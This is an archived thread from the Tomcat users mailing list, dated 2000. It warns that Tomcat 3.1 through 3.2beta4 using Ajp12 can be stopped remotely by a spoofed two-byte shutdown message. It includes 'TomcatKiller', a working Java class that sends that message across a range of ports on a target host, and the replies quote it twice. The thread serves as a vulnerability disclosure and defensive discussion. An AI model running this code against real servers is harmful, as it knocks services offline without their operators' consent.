You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@tomcat.apache.org by Stuart Maclean <st...@its.washington.edu> on 2000/10/05 21:51:50 UTC
Tomcat Killer
Hi all, just a word of warning about Tomcat 3.1 and from what I can
tell, 3.2beta4. Looking at the source code, if you're using Ajp12 for
the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
batch/shell file does its job by sending "exit please" bytes to
Tomcat. It doesn't take much to spoof this, here's my TomcatKiller
class below. Just guess a host and port which may have Tomcat
running, and over it goes...
I patched the sources so hopefully it won't happen to me ;)
import java.net.*;
import java.io.*;
public class TomcatKiller {
static public void main( String[] args ) {
final byte SIGNAL = (byte)254;
final byte BYEBYE = (byte)15;
byte[] msg = { SIGNAL, BYEBYE };
int min = 8007, max = 8007;
String host = args[0];
try {
if( args.length > 1 )
min = max = Integer.parseInt( args[1] );
if( args.length > 2 )
max = Integer.parseInt( args[2] );
if( min > max ) {
int tmp = min;
min = max;
max = tmp;
}
for( int i = min; i <= max; i++ ) {
try {
Socket s = new Socket( host, i );
OutputStream os = s.getOutputStream();
os.write( msg );
os.flush();
break;
} catch( ConnectException ce ) {
System.err.println( "conn refused " + i );
} catch( IOException ioe ) {
ioe.printStackTrace();
break;
}
}
} catch( Exception e ) {
e.printStackTrace();
System.exit( 1 );
}
}
}
// eof
stu
--
Stuart Maclean, Research Associate
University of Washington
ITS Research Program, College of Engineering
Box 352500
Seattle, WA 98195-2500
Tel: (206) 543-0637
http://www.its.washington.edu
Re: Tomcat Killer
Posted by Steve Weiland <sw...@viatraining.com>.
It won't kill 3.2beta2 on a different host.
Steve
Stuart Maclean wrote:
> Hi all, just a word of warning about Tomcat 3.1 and from what I can
> tell, 3.2beta4. Looking at the source code, if you're using Ajp12 for
> the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
> batch/shell file does its job by sending "exit please" bytes to
> Tomcat. It doesn't take much to spoof this, here's my TomcatKiller
> class below. Just guess a host and port which may have Tomcat
> running, and over it goes...
>
> I patched the sources so hopefully it won't happen to me ;)
>
> import java.net.*;
> import java.io.*;
>
> public class TomcatKiller {
>
> static public void main( String[] args ) {
>
> final byte SIGNAL = (byte)254;
> final byte BYEBYE = (byte)15;
> byte[] msg = { SIGNAL, BYEBYE };
>
> int min = 8007, max = 8007;
> String host = args[0];
>
> try {
> if( args.length > 1 )
> min = max = Integer.parseInt( args[1] );
> if( args.length > 2 )
> max = Integer.parseInt( args[2] );
> if( min > max ) {
> int tmp = min;
> min = max;
> max = tmp;
> }
> for( int i = min; i <= max; i++ ) {
> try {
> Socket s = new Socket( host, i );
> OutputStream os = s.getOutputStream();
> os.write( msg );
> os.flush();
> break;
> } catch( ConnectException ce ) {
> System.err.println( "conn refused " + i );
> } catch( IOException ioe ) {
> ioe.printStackTrace();
> break;
> }
> }
> } catch( Exception e ) {
> e.printStackTrace();
> System.exit( 1 );
> }
> }
> }
>
> // eof
>
> stu
>
> --
> Stuart Maclean, Research Associate
> University of Washington
> ITS Research Program, College of Engineering
> Box 352500
> Seattle, WA 98195-2500
> Tel: (206) 543-0637
> http://www.its.washington.edu
Re: Tomcat Killer
Posted by Sean Schofield <se...@schof.com>.
Cool find!
Couldn't this be protected against by a firewall filtering incoming traffic
so both Apache and Tomcat are behind a firewall to the Intrenet and a
another firewall between these servers and the LAN? Then you would only
have to worry about other servlets, etc. within the firewall messing things
up. And even then I think you need root to create sockets don't you?
Should this be posted to Bugtraq?
- schof
At 12:51 PM 10/5/00 -0700, you wrote:
>Hi all, just a word of warning about Tomcat 3.1 and from what I can
>tell, 3.2beta4. Looking at the source code, if you're using Ajp12 for
>the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
>batch/shell file does its job by sending "exit please" bytes to
>Tomcat. It doesn't take much to spoof this, here's my TomcatKiller
>class below. Just guess a host and port which may have Tomcat
>running, and over it goes...
>
>I patched the sources so hopefully it won't happen to me ;)
>
>
>import java.net.*;
>import java.io.*;
>
>public class TomcatKiller {
>
> static public void main( String[] args ) {
>
> final byte SIGNAL = (byte)254;
> final byte BYEBYE = (byte)15;
> byte[] msg = { SIGNAL, BYEBYE };
>
> int min = 8007, max = 8007;
> String host = args[0];
>
> try {
> if( args.length > 1 )
> min = max = Integer.parseInt( args[1] );
> if( args.length > 2 )
> max = Integer.parseInt( args[2] );
> if( min > max ) {
> int tmp = min;
> min = max;
> max = tmp;
> }
> for( int i = min; i <= max; i++ ) {
> try {
> Socket s = new Socket( host, i );
> OutputStream os =
> s.getOutputStream();
> os.write( msg );
> os.flush();
> break;
> } catch( ConnectException ce ) {
> System.err.println( "conn refused
> " + i );
> } catch( IOException ioe ) {
> ioe.printStackTrace();
> break;
> }
> }
> } catch( Exception e ) {
> e.printStackTrace();
> System.exit( 1 );
> }
> }
>}
>
>// eof
>
>
>stu
>
>
>--
>Stuart Maclean, Research Associate
>University of Washington
>ITS Research Program, College of Engineering
>Box 352500
>Seattle, WA 98195-2500
>Tel: (206) 543-0637
>http://www.its.washington.edu